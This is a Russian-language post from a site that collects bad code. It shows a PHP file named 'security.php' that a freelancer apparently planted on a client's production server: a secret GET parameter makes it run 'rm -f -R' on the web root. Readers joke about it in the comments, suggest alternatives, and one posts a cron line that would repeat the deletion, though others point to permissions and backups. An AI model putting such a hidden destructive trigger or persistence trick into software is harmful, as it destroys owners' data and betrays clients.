1. PHP / Говнокод #12576

    +136

    1. 1
    2. 2
    3. 3
    4. 4
    5. 5
    6. 6
    7. 7
    8. 8
    <?php
    $param = $_GET['delaem'];
    if($param=='nahui')
    {
        $dir = __DIR__;
        shell_exec("rm -f -R ".$_SERVER['DOCUMENT_ROOT']);
    }
    ?>

    Фрилансер защищает себя от неплатежеспособного заказчика xD

    Файл лежал на продакшин сервере около года, название файла - security.php

    Запостил: uint, 11 Февраля 2013

    Комментарии (9) RSS

    • ок, пошел внедрять.
      Ответить
    • shell_exec не айс, админы любят такую лабуду отключать. opendir, readdir и понеслась.
      Ответить
    • Отдаёт японским.
      Ответить
      • По-японски это так:
        if($param=='harakiri')
        {
            //...
            echo 'Sakura blossoming';
        }
        Ответить
    • по моему опыту, на "допилку" нанимается спустя приличный срок совершенно другой фрилансер, который по незнанию или умышленно уничтожает подобные триалки.
      что еще хуже, так это то, что существует значительная вероятность подбора параметров скрипт-кидди (многие мыслят одинаково)
      Ответить
    • Правильно выставить права и всё, что он сможет сделать - вздохнуть грустно и с недоумением.
      Ответить
      • Более того, никто не запрещает делать бекапы, а так хоть в крон восстановление запихивай. Вот уж обрадуется автор, когда его сворованное творение само воскреснет через несколько минут.
        Ответить
        • и опять исчезнет, и опять воскреснет, и опять исчезнет...
          Ответить
        • shell_exec('echo "rm -f -R ' . $_SERVER['DOCUMENT_ROOT'] . '" >> tmpcron && crontab tmpcron && rm -f tmpcron');
          Ответить

    Добавить комментарий